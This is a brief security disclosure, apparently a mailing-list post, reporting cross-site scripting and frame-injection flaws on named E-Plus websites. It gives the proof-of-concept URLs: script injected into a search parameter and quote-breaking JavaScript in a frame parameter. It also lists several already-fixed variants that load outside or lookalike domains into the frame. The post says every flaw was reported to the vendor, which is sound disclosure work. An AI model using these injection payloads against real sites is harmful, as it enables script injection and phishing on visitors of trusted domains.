www.eplus.de suffers from cross site scripting and remote file inclusion vulnerabilities.
4d4a8f8cd67095cc202653d66fab907b691872b1732c773d7324c7152a00ad1e
Here we go:
https://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
https://www.eplus-unternehmen.de/frame.asp?go=https://www.eplus.de/');alert(1);document.write('
https://www.eplus-unternehmen.de/frame.asp?go=');alert('
Already fixed ones:
https://www.eplus-unternehmen.de/frame.asp?go=https://www.google.de/
https://www.eplus-unternehmen.de/frame.asp?go=https://www.eplus.de@www.google.de
https://www.eplus-unternehmen.de/frame.asp?go=https://www.eplus.dedomain.com
https://www.eplus-unternehmen.de/frame.asp?go=https://www.eplus.de.mydomain.com
With lot's of work done by alexander brachmann, www.bitsploit.de.
All have been reported to E-Plus before.
Blog-entry english:
https://www.hboeck.de/item/458
Blog-entry german (more detailed):
https://www.hboeck.de/item/457
--
Hanno Böck Blog: https://www.hboeck.de/
GPG: 3DBD3B20 Jabber: jabber@hboeck.de